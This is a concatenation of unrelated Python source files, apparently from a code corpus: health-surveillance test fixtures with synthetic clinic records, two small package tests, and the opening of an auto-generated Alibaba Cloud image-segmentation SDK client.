"variables": {"data_entry":1, "vac_i0_var":0,"vac_i12_var":0,"vac_ses":0,"vac_pw_vat1":0,"vac_pw_vat2":0,"vac_pw_vat3":0,"vac_pw_vat4":0,"vac_pw_vat5":0,"vac_i0_bcg":0,"vac_i0_vpi":0,"vac_i12_bcg":0,"vac_i0_dtc1":0,"vac_i0_dtc2":0,"vac_i0_dtc3":0,"vac_i0_pcv1":0,"vac_i0_pcv2":0,"vac_i0_pcv3":0,"vac_i12_vpi":0,"vac_i0_vpo0":0,"vac_i0_vpo1":0,"vac_i0_vpo2":0,"vac_i0_vpo3":0,"vac_notpw_vat1":0,"vac_notpw_vat2":0,"vac_notpw_vat3":0,"vac_notpw_vat4":0,"vac_notpw_vat5":0,"vac_i12_dtc1":0,"vac_i12_dtc2":0,"vac_i12_dtc3":0,"vac_i12_pcv1":0,"vac_i12_pcv2":0,"vac_i12_pcv3":0,"vac_i0_rota1":0,"vac_i0_rota2":0,"vac_i0_rota3":0,"vac_i12_vpo0":0,"vac_i12_vpo1":0,"vac_i12_vpo2":0,"vac_i12_vpo3":0,"vac_i12_rota1":0,"vac_i12_rota2":0,"vac_i12_rota3":0
},'clinic': 11, 'geolocation': 'POINT(-0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{
'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6,
"variables": {"data_entry":1, "vac_i0_var":1,"vac_i12_var":1,"vac_ses":1,"vac_pw_vat1":1,"vac_pw_vat2":1,"vac_pw_vat3":1,"vac_pw_vat4":1,"vac_pw_vat5":1,"vac_i0_bcg":1,"vac_i0_vpi":1,"vac_i12_bcg":1,"vac_i0_dtc1":1,"vac_i0_dtc2":1,"vac_i0_dtc3":1,"vac_i0_pcv1":1,"vac_i0_pcv2":1,"vac_i0_pcv3":1,"vac_i12_vpi":1,"vac_i0_vpo0":1,"vac_i0_vpo1":1,"vac_i0_vpo2":1,"vac_i0_vpo3":1,"vac_notpw_vat1":1,"vac_notpw_vat2":1,"vac_notpw_vat3":1,"vac_notpw_vat4":1,"vac_notpw_vat5":1,"vac_i12_dtc1":1,"vac_i12_dtc2":1,"vac_i12_dtc3":1,"vac_i12_pcv1":1,"vac_i12_pcv2":1,"vac_i12_pcv3":1,"vac_i0_rota1":1,"vac_i0_rota2":1,"vac_i0_rota3":1,"vac_i12_vpo0":1,"vac_i12_vpo1":1,"vac_i12_vpo2":1,"vac_i12_vpo3":1,"vac_i12_rota1":1,"vac_i12_rota2":1,"vac_i12_rota3":1
},'clinic': 11, 'geolocation': 'POINT(-0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
#Freeze date of the test: 24 Dec 2016
#id 1,
#comp_week - completeness in the most recent week is 25; only clinic A reported every day.
#clinic_num - 4 health facilities
#!!!comp_year = approx 1.9. In the last 51 weeks we had 100% completeness in only one week.
#dea_0 - reported deaths; 7 this week in clinic A.
# dea_0 ale_1 - deaths from community (7)
# cmd_21 - maternal, ale_1 maternal investigated
# cmd_22 - neonatal, ale_1 investigated
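# Sketch of the comp_year arithmetic above (illustration only; the names below
# are hypothetical and not used by any fixture):
#   fully_reported_weeks = 1    # only one of the last 51 weeks reached 100%
#   weeks_so_far = 51
#   comp_year = 100 * fully_reported_weeks / weeks_so_far  # ~= 1.96, the "approx 1.9" above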
oms_report = [
#completeness, Districts Blue, Red and Green
Data(**{"uuid":"10","type":"case","date":"2016-12-20T00:00:00", "epi_week": 51, "country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"100","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"101","type":"case","date":"2016-12-19T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":2,
"reg_5":2
},"geolocation": "POINT(0 0)"}),
# Data(**{"uuid":"102","type":"case","date":"2016-12-21T00:00:00","country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
# "variables": {"data_entry":1,
# "reg_1":5,
# "reg_5":5
# },"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"11","type":"case","date":"2016-11-20T00:00:00","country":1,"epi_week": 51,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"12","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":4,
"reg_5":4
},"geolocation": "POINT(0 0)"}),
#Completeness in the week after the date of the report. Shouldn't change the weekly completeness
#4 daily registers mean that completeness in this week is 100
Data(**{"uuid":"112","type":"case","date":"2016-12-29T00:00:00","epi_week": 52,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":4,
"reg_5":4
},"geolocation": "POINT(0 0)"}),
#50 deaths and 50 cases of severe malnutrition `dea_0` and `cmd_24` in the week after the report. Shouldn't appear in weekly highlights
Data(**{"uuid":"113","type":"case","date":"2016-12-29T00:00:00","epi_week": 52,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"dea_0":50,
"cmd_24":50,
},"geolocation": "POINT(0 0)"}),
#THIS WEEK
#Clinic A
#14 deaths (dea_0) in this week, half of them (ale_1) from community
#21 cases of severe malnutrition `cmd_24` in Region Major and 19 of moderate (`cmd_23`)
#120 cases of fever (mls_2) and 40 cases tested (mls_3)
#MALARIA data
#10 deaths from malaria (mls_36)
#30 positively tested cases of malaria (cmd_17), i.e. 30 of the 40 tested (mls_3)
#10 simple (mls_12) and 20 severe (mls_24), 15 (mls_48) treated with ACT
Data(**{"uuid":"1","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"mls_2":120,
"mls_3":40,
"mls_12":10,
"mls_24":20,
"mls_48":15,
"dea_0":7,
"mls_36":10,
"cmd_17":30
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"2","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"dea_0":7,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"3","type":"case","date":"2016-10-24T00:00:00","epi_week": 47,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
},"geolocation": "POINT(0 0)"}),
#Measles for WEEKLY HIGHLIGHTS
#125 cases in total (cmd_15)
#40 suspected but not tested
#ale_1 investigated (50)
#ale_2 confirmed (25)
#age_1 - 10 cases among children <5
Data(**{"uuid":"13","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":40
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"14","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":10,
"age_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"15","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":50,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"16","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":25,
"ale_2":1
},"geolocation": "POINT(0 0)"}),
#Acute flaccid paralysis for WEEKLY HIGHLIGHTS
#99 cases suspected (cmd_10)
#ale_1 investigated (33)
Data(**{"uuid":"17","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_10":66,
"mor_11":33
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"18","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_10":33,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
#Malnutrition for WEEKLY HIGHLIGHTS
#severe malnutrition `cmd_24`: 40 and moderate `cmd_23`: 20; 40 cases from Major and 20 from minor
#major
Data(**{"uuid":"20","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_24":21,
"cmd_23":19,
},"geolocation": "POINT(0 0)"}),
#minor
Data(**{"uuid":"21","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_24":19,
"cmd_23":1,
},"geolocation": "POINT(0 0)"}),
#All cases in clinic C,
# REPORTED only
#Diarrhoea.
#15 `cmd_1` acute and 10 deaths (`mor_18`)
#22 `cmd_4` bloody (dysentery)
#12 `cmd_2` watery (cholera)
#40 cases `cmd_25` ARTI (Acute respiratory tract infection)
#23 cases `cmd_18` influenza-like illness
#100 cases `cmd_27` of animal bites
#20 UNCONFIRMED cases of Rabies `cmd_11`
#99 UNCONFIRMED cases of Plague `cmd_7`
Data(**{"uuid":"22","type":"case","date":"2016-12-22T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_1":15,
"mor_18":10,
"cmd_4":22,
"cmd_2":12,
"cmd_25":40,
"cmd_18":23,
"cmd_27":100,
"cmd_11":20,
"cmd_7":99
},"geolocation": "POINT(0 0)"}),
#clinic C cases INVESTIGATED `ale_1`
#76 investigated cases of Plague `cmd_7` with `ale_1`
Data(**{"uuid":"23","type":"case","date":"2016-12-23T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_7":76,
"ale_1":1,
},"geolocation": "POINT(0 0)"}),
#clinic C cases CONFIRMED
#Confirmed Rabies
#15 confirmed cases of Rabies `cmd_11` with `ale_2`
#16 confirmed cases of Plague `cmd_7` with `ale_2`
Data(**{"uuid":"24","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_11":15,
"cmd_7":16,
"ale_2":1,
},"geolocation": "POINT(0 0)"}),
#Clinic B, District Blue, Region Major.
#14 Maternal deaths and 10 neonatal NOT investigated
Data(**{"uuid":"6","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":14,
"cmd_22":10,
},"geolocation": "POINT(0 0)"}),
#5 Maternal deaths and 2 neonatal *investigated*
Data(**{"uuid":"7","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":5,
"cmd_22":2,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
# 1 maternal death and 1 neonatal investigated in District Green
Data(**{"uuid":"70","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":1,
"cmd_22":1,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
#
#
# PREVIOUS WEEKS
# SHOULDN'T be in Weekly Highlights
#
#
#Clinic B, District Blue, Region Major.
#17 Maternal deaths and 17 neonatal NOT investigated
Data(**{"uuid":"31","type":"case","date":"2016-10-24T00:00:00","epi_week": 37,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":17,
"cmd_22":17,
},"geolocation": "POINT(0 0)"}),
#Malaria map takes cases of `epi_1` and `epi_2`
#malaria map by type `mls_12`, `mls_24`, `mls_3`
#clinic C in region major of population 750
Data(**{"uuid":"32","type":"case","date":"2016-11-20T00:00:00","epi_week": 47,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_1":7,
"epi_2":25,
"mls_12":14,
"mls_24":22,
"mls_3":100
},"geolocation": "POINT(0 0)"}),
#clinic D in region minor of population 250
Data(**{"uuid":"33","type":"case","date":"2016-11-24T00:00:00","epi_week": 47,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_1":25,
"epi_2":75,
"mls_12":4,
"mls_24":2,
"mls_3":10
},"geolocation": "POINT(0 0)"}),
#Measles over 5 yo
# 13 cases
Data(**{"uuid":"34","type":"case","date":"2016-11-24T00:00:00","epi_week": 47,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":13,
"mor_13":5,
"age_3":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"35","type":"case","date":"2016-11-11T00:00:00","epi_week": 46, "country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":7,
"age_5":5
},"geolocation": "POINT(0 0)"}),
#Severe malnutrition under 5 yo
#It comes from epi code 8 (`epi_8`)
# 5 cases of malnutrition in a week in September at clinic D
Data(**{"uuid":"36","type":"case","date":"2016-09-11T00:00:00","epi_week": 37, "country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_8":5
},"geolocation": "POINT(0 0)"}),
#Priority diseases table: cumulative information
#Acute diarrhoea cases from a previous week (July) to alter the cumulative totals
Data(**{"uuid":"37","type":"case","date":"2016-07-22T00:00:00","country":1,"epi_week": 30, "region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_1":80,
"mor_18":70,
},"geolocation": "POINT(0 0)"}),
]
date = datetime.date.today()
start = datetime.datetime(date.year, 1, 1)
offset = date.weekday() - start.weekday()
if offset < 0:
    offset = 7 + offset
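# `offset` is the number of days back to the most recent weekday matching that
# of 1 January, so the completeness fixtures below stay aligned to the same
# epi-week boundary regardless of which day the tests are run on.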
completeness = [
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a2', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=2 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a3', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=3 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a4', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=8 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a5', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['pip']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a6', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['pip']})  # Same day should not count
]
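# Note (assumed semantics, consistent with the comment above): completeness is
# expected to count distinct reporting days per clinic and week, so the duplicate
# same-day record for clinic 8 should not raise its daily-register count.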
latest_test = [
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 7, 'region': 2, 'country': 1, "date":"2017-01-02T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 7}, 'clinic': 7, 'region': 2, 'country': 1, "date":"2017-01-03T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-02T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-03T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1 }, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-10T00:00:00"})
]
| 158.857355 | 1,290 | 0.596964 | 16,826 | 106,911 | 3.638417 | 0.038215 | 0.016171 | 0.098791 | 0.10428 | 0.912055 | 0.904035 | 0.89706 | 0.887765 | 0.879582 | 0.876642 | 0 | 0.139952 | 0.13009 | 106,911 | 672 | 1,291 | 159.09375 | 0.518306 | 0.036488 | 0 | 0.15458 | 0 | 0 | 0.481591 | 0.041112 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003817 | 0 | 0.003817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ec3489135e45a3e3273966728a457b2465effe80 | 119 | py | Python | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 4 | 2019-10-27T16:46:43.000Z | 2021-12-03T10:35:53.000Z | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 17 | 2018-06-24T14:59:18.000Z | 2022-02-17T06:32:12.000Z | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2021-02-19T03:36:47.000Z | 2022-02-16T16:39:36.000Z | import wirerope
def test_package():
    assert wirerope.__version__
    assert wirerope.__version__.startswith('0.')
| 17 | 48 | 0.756303 | 13 | 119 | 6.230769 | 0.692308 | 0.345679 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009901 | 0.151261 | 119 | 6 | 49 | 19.833333 | 0.792079 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b5eaf2c3aef4f779e29d29dfd8c5d4f9969671b | 108 | py | Python | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.stdlib import memory_compare
def main() -> int:
    return memory_compare(1, 1)
| 18 | 54 | 0.740741 | 16 | 108 | 4.875 | 0.8125 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032967 | 0.157407 | 108 | 5 | 55 | 21.6 | 0.824176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
6bf2cb1f64a5d8c8b39236cde015e34ccb4feefc | 38,717 | py | Python | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | # This file is auto-generated, don't edit it. Thanks.
from alibabacloud_tea_rpc.client import Client as RPCClient
from alibabacloud_imageseg20191230 import models as imageseg_20191230_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_tea_rpc import models as _rpc_models
from alibabacloud_openplatform20191219.client import Client as OpenPlatformClient
from alibabacloud_openplatform20191219 import models as open_platform_models
from alibabacloud_oss_sdk import models as _oss_models
from alibabacloud_rpc_util.client import Client as RPCUtilClient
from alibabacloud_oss_sdk.client import Client as OSSClient
from alibabacloud_tea_fileform import models as file_form_models
from alibabacloud_oss_util import models as ossutil_models
from alibabacloud_endpoint_util.client import Client as EndpointUtilClient
class Client(RPCClient):
def __init__(self, config):
super().__init__(config)
self._endpoint_rule = "regional"
self.check_config(config)
self._endpoint = self.get_endpoint("imageseg", self._region_id, self._endpoint_rule, self._network, self._suffix, self._endpoint_map, self._endpoint)
def segment_animal(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentAnimalResponse().from_map(self.do_request("SegmentAnimal", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_animal_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_animalreq = imageseg_20191230_models.SegmentAnimalRequest(
)
RPCUtilClient.convert(request, segment_animalreq)
segment_animalreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_animal_resp = self.segment_animal(segment_animalreq, runtime)
return segment_animal_resp
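    # Each *_advance method below follows the same three-step pattern as
    # segment_animal_advance above: (0) fetch a temporary upload authorization
    # from openplatform, (1) POST the local image to the authorized OSS
    # bucket/key, and (2) rewrite image_url to the uploaded object before
    # delegating to the plain API method.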
def segment_hdbody(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHDBodyResponse().from_map(self.do_request("SegmentHDBody", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_hdbody_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_hdbodyreq = imageseg_20191230_models.SegmentHDBodyRequest(
)
RPCUtilClient.convert(request, segment_hdbodyreq)
segment_hdbodyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_hdbody_resp = self.segment_hdbody(segment_hdbodyreq, runtime)
return segment_hdbody_resp
def segment_sky(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentSkyResponse().from_map(self.do_request("SegmentSky", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_sky_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
